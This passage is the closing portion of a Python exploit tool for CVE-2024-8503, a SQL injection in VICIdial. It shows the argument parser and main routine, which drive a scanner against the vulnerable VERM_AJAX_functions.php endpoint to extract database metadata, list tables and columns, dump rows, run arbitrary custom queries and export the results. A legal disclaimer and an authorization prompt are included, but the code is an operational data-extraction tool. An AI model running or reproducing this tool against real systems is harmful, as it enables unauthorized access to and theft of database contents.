        description='VICIdial CVE-2024-8503 Proof of Concept Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog='''
Examples:
  # Interactive mode
  %(prog)s --url https://target.com --interactive

  # Extract metadata
  %(prog)s --url https://target.com --metadata db_version database db_user

  # List tables
  %(prog)s --url https://target.com --list-tables

  # Get columns
  %(prog)s --url https://target.com --get-columns call_log

  # Extract table data
  %(prog)s --url https://target.com --table call_log --columns uniqueid,channel --rows 3

  # Auto-extract table data
  %(prog)s --url https://target.com --auto-extract call_log

  # Full scan (resumable)
  %(prog)s --url https://target.com --full-scan

  # Self-check (no network activity)
  %(prog)s --self-check

LEGAL NOTICE:
  This tool is for authorized security testing only. Unauthorized access
  to computer systems is illegal. Obtain written permission before testing.
        '''
    )
    
    parser.add_argument('--url', help='Target URL')
    parser.add_argument('--path', default='/VERM/VERM_AJAX_functions.php', help='Path to vulnerable endpoint')
    parser.add_argument('--interactive', action='store_true', help='Run in interactive mode')
    parser.add_argument('--metadata', nargs='+', 
                       choices=['db_version', 'database', 'db_user', 'hostname', 
                               'db_privileges', 'table_count', 'all'],
                       help='Extract metadata')
    parser.add_argument('--list-tables', action='store_true', help='List database tables')
    parser.add_argument('--get-columns', metavar='TABLE', help='Get columns for table')
    parser.add_argument('--column-limit', type=int, default=DEFAULT_COLUMN_LIMIT, 
                       help=f'Number of columns (max {MAX_COLUMN_LIMIT}, default: {DEFAULT_COLUMN_LIMIT})')
    parser.add_argument('--table', help='Table to extract data from')
    parser.add_argument('--columns', help='Comma-separated column names')
    parser.add_argument('--rows', type=int, default=DEFAULT_ROW_LIMIT, 
                       help=f'Number of rows (max {MAX_ROW_LIMIT}, default: {DEFAULT_ROW_LIMIT})')
    parser.add_argument('--auto-extract', metavar='TABLE', help='Auto-extract table data')
    parser.add_argument('--custom-query', help='Execute custom SQL query')
    parser.add_argument('--full-scan', action='store_true', help='Perform full scan (resumable)')
    parser.add_argument('--skip-vuln-check', action='store_true', help='Skip vulnerability verification')
    parser.add_argument('--export', help='Export results to file')
    parser.add_argument('--self-check', action='store_true', help='Print configuration and exit (no network)')
    
    return parser.parse_args()

def run_self_check():
    """Print configuration and exit without any network activity"""
    print("\n[+] Self-check (no network activity)")
    print(f"[+] Version: {VERSION}")
    print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")
    print(f"[+] Max metadata length: {MAX_LENGTH}")
    print(f"[+] Max cell length: {MAX_CELL_LENGTH}")
    print(f"[+] State file: .vicidial_scan_state.json")
    print(f"[+] Metadata keys: {', '.join(sorted(METADATA_QUERIES.keys()))}")

def main():
    """Main entry point"""
    start_time = time.time()
    
    OutputFormatter.print_banner()
    args = parse_arguments()

    if args.self_check:
        run_self_check()
        return

    if not args.url:
        print("[-] Missing required argument: --url")
        return
    
    print("\n[!] LEGAL DISCLAIMER:")
    print("    This tool is for AUTHORIZED SECURITY TESTING ONLY.")
    print("    Unauthorized access is ILLEGAL. Proceed only with written permission.\n")
    
    response = input("Do you have authorization to test this target? (yes/no): ").strip().lower()
    if response != 'yes':
        print("\n[!] Authorization required. Exiting.")
        return
    
    scan_state = ScanState()
    
    # Check for resumable scan
    if scan_state.get_target() and scan_state.get_target() == (args.url.rstrip('/') + args.path):
        if scan_state.show_resume_prompt():
            print("[+] Resuming from previous scan...")
        else:
            scan_state.clear_state()
    
    print("\n[+] Initializing scanner...")
    print(f"[+] Target: {args.url}{args.path}")
    print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")
    
    scanner = VulnerabilityScanner(args.url, args.path)
    
    if not scanner.initialize(skip_vuln_check=args.skip_vuln_check):
        print("\n[-] Initialization failed. Exiting.")
        send_notification("VICIdial PoC", "Scan failed - initialization error")
        return
    
    scan_state.set_target(scanner.target)
    
    if args.interactive:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.run()
        
        duration = time.time() - start_time
        print(f"\n[+] Total time: {duration/60:.1f} minutes")
        send_notification("VICIdial PoC", f"Interactive scan completed in {duration/60:.1f} minutes")
        play_completion_sound()
        return
    
    metadata_queries = METADATA_QUERIES
    
    if args.metadata:
        results = {}
        queries = metadata_queries if 'all' in args.metadata else {k: metadata_queries[k] for k in args.metadata if k in metadata_queries}
        
        for name, query in queries.items():
            result = scanner.extract_metadata(name, query)
            if result:
                results[name] = result
                scan_state.update_metadata(name, result)
        
        OutputFormatter.print_metadata_summary(results)
        
        if args.export:
            OutputFormatter.export_json(results, args.export)
    
    if args.list_tables:
        tables = scanner.list_tables()
        if tables:
            scan_state.update_tables(tables)
            OutputFormatter.print_table_list(tables)
    
    if args.get_columns:
        columns = scanner.get_table_columns(args.get_columns, args.column_limit)
        if columns:
            scan_state.update_table_columns(args.get_columns, columns)
            OutputFormatter.print_columns_list(args.get_columns, columns)
    
    if args.table and args.columns:
        columns = [c.strip() for c in args.columns.split(',')]
        data = scanner.extract_table_data(args.table, columns, args.rows)
        OutputFormatter.print_table_data(args.table, columns, data)
        
        if args.export:
            OutputFormatter.export_csv(columns, data, args.export)
    
    if args.auto_extract:
        columns, data = scanner.auto_extract_table(args.auto_extract)
        
        if columns and data:
            scan_state.update_table_columns(args.auto_extract, columns)
            OutputFormatter.print_table_data(args.auto_extract, columns, data)
            
            if args.export:
                OutputFormatter.export_csv(columns, data, args.export)
    
    if args.custom_query:
        query = args.custom_query if args.custom_query.startswith('SELECT') else f"SELECT {args.custom_query}"
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()
        
        try:
            result = scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            print(f"\n[-] Error: {e}")
    
    if args.full_scan:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.full_scan()
    
    duration = time.time() - start_time
    
    print("\n[+] Scan complete!")
    print(f"[+] Total time: {duration/60:.1f} minutes")
    print("[+] Remember: All operations were READ-ONLY")
    print("[+] CVE-2024-8503 - CRITICAL Severity\n")
    
    send_notification("VICIdial PoC", f"Scan completed in {duration/60:.1f} minutes")
    play_completion_sound()

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Interrupted by user. Exiting...")
        sys.exit(0)
    except Exception as e:
        print(f"\n[-] Unexpected error: {e}")
        sys.exit(1)